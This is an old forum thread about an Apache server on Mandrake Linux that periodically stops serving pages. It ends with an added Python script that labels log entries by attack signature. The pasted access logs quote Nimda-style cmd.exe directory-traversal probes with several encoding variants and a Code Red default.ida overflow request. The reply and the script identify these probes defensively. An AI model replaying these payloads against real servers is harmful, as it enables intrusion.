  1. #1
    Just Joined!
    Join Date
    Sep 2003
    Location
    Los Angeles, California
    Posts
    13

    Apache stops serving pages....


    Hello, I hope you can help me. It's been two weeks now and I can't get an answer anywhere.

    I'm using Mandrake 9.2.
    This is the output from "apachectl extendedstatus"
    Apache-AdvancedExtranetServer/2.0.47 (Mandrake Linux/6.3.92mdk) mod_fortress/1.0 mod_ssl/2.0.47 OpenSSL/0.9.7b PHP/4.3.2

    The server works fine for a while (anywhere from twenty minutes to six hours), then it stops serving pages. The logs seem to still be working, and so does Apache, but the pages just won't show up in the browser. Under access_log it shows every time I try to log on as [192.168.1.1 - - [31/Mar/2004:15:37:47 -0800] "GET / HTTP/1.1" 200 7209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"] which leads me to believe the server thinks it went through. If I try to load the page again the log shows the same entry again.


    Here are some suspicious log entries.

    access_log:
    127.0.0.1 - - [29/Mar/2004:13:01:34 -0800] "GET /server-status HTTP/1.0" 200 1914 "-" "Lynx/2.8.5dev.12 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7b"

    ##This I assume are attempts at hacking windows servers.
    ##Shows up at least eight times.
    68.204.239.13 - - [29/Mar/2004:14:10:08 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 399 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:10:10 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 397 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:10:10 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 407 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:10:11 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 407 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:10:12 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 421 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:10:16 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 438 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:11:46 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 438 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:13:17 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 454 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:14:47 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 420 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:16:18 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 420 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:17:04 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 420 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:17:07 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 420 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:17:11 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 411 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:17:11 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 411 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:17:12 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 421 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:17:13 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 421 "-" "-"

    ##This also shows up several times
    68.40.15.102 - - [29/Mar/2004:16:15:40 -0800] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%u cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b %u53ff%u0078%u0000%u00=a HTTP/1.0" 404 394 "-" "-"

    82.48.245.88 - - [29/Mar/2004:19:26:53 -0800] "GET http://dc.tickerbar.net:42857/tld/pxy.m?nc=145295770 HTTP/1.0" 404 392 "-" "-"

    localhost - - [31/Mar/2004:15:59:34 -0800] "GET /server-status HTTP/1.0" 200 1937 "-" "Lynx/2.8.5dev.12 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7b"




    error_log:
    ##This is repeated all throughout the log, over and over.
    [Sun Mar 28 17:42:56 2004] [notice] Digest: generating secret for digest authentication ...
    [Sun Mar 28 17:42:56 2004] [notice] Digest: done
    [Sun Mar 28 17:42:56 2004] [notice] Apache-AdvancedExtranetServer/2.0.47 (Mandrake Linux/6.3.92mdk) mod_fortress/1.0 mod_ssl/2.0.47 OpenSSL/0.9.7b PHP/4.3.2 configured -- resuming normal operations
    [Sun Mar 28 17:48:38 2004] [notice] caught SIGTERM, shutting down
    [Sun Mar 28 17:48:39 2004] [notice] Digest: generating secret for digest authentication ...
    [Sun Mar 28 17:48:39 2004] [notice] Digest: done
    [Sun Mar 28 17:48:39 2004] [notice] Apache-AdvancedExtranetServer/2.0.47 (Mandrake Linux/6.3.92mdk) mod_fortress/1.0 mod_ssl/2.0.47 OpenSSL/0.9.7b PHP/4.3.2 configured -- resuming normal operations
    [Sun Mar 28 17:49:06 2004] [notice] caught SIGTERM, shutting down
    [Sun Mar 28 17:51:38 2004] [notice] Digest: generating secret for digest authentication ...
    [Sun Mar 28 17:51:38 2004] [notice] Digest: done

    [Sun Mar 28 23:45:00 2004] [error] [client 196.40.37.190] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /

    ///////////////////////////////////////////////////////////

    That's most of what I can see that does not seem right.
    Please any lead would help. I'm close to just dumping the whole thing. Might change distributions and start from scratch.

  2. #2
    flw
    Linux Engineer
    Join Date
    Mar 2003
    Location
    U.S.A.
    Posts
    1,025
    Your first log section on incoming connection attempts (GET /scripts/root.exe?/) appears to be Nimda from another server on the net looking for a place to plant a seed. Another (GET /default.ida?) is Code Red from another server, like Nimda, looking for the future on your machine.

    Since you're on Linux, the above is just a minor bandwidth issue and not your root cause.

    The following page contains possible causes and solutions as well as references to more info at http://lists.debian.org/debian-user/.../msg02247.html
    Dan

    "Keep your friends close and your enemies even closer" from The Art of War by Sun Tzu
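
An added example, not part of either post: a small triage script that labels access_log entries using the request shapes quoted in this thread and reports whether any probe was answered with a 2xx status. The labels follow the reply's identification of Nimda and Code Red; treating an absolute-URI GET as an open-proxy probe, the function names and the sample lines (constructed, using documentation addresses) are assumptions of this example.

```python
import re
from collections import Counter

# Combined Log Format: host ident user [time] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>.*?) (?P<proto>HTTP/\d\.\d)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures built from the request shapes quoted in the thread.
SIGNATURES = [
    ("nimda-iis-probe", re.compile(r'(?:cmd|root)\.exe\?/c\+', re.I)),
    ("codered-ida-probe", re.compile(r'^/default\.ida\?[A-Z]{16,}', re.I)),
    ("open-proxy-probe", re.compile(r'^https?://', re.I)),  # assumption
]

def classify(line):
    """Return (host, label, status) for a log line, or None if unparseable."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    label = next((n for n, rx in SIGNATURES if rx.search(m["target"])), "normal")
    return m["host"], label, int(m["status"])

def summarize(lines):
    """Count hits per label and collect probes the server answered with 2xx."""
    counts, served = Counter(), []
    for rec in filter(None, map(classify, lines)):
        counts[rec[1]] += 1
        if rec[1] != "normal" and 200 <= rec[2] < 300:
            served.append(rec)  # a probe that got content deserves a look
    return counts, served

# Constructed sample lines modelled on the entries in the post.
SAMPLE = [
    '203.0.113.7 - - [29/Mar/2004:14:10:08 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 399 "-" "-"',
    '203.0.113.7 - - [29/Mar/2004:14:10:12 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 421 "-" "-"',
    '198.51.100.9 - - [29/Mar/2004:16:15:40 -0800] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX%u9090=a HTTP/1.0" 404 394 "-" "-"',
    '198.51.100.23 - - [29/Mar/2004:19:26:53 -0800] "GET http://proxy-check.example:8080/p HTTP/1.0" 404 392 "-" "-"',
    '192.168.1.1 - - [31/Mar/2004:15:37:47 -0800] "GET / HTTP/1.1" 200 7209 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    counts, served = summarize(SAMPLE)
    print(dict(counts), "probes answered with 2xx:", served)
```

An empty second result means every matched probe was rejected (404 or 400), which is consistent with the reply's reading that these requests are background noise rather than the cause of the outage.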
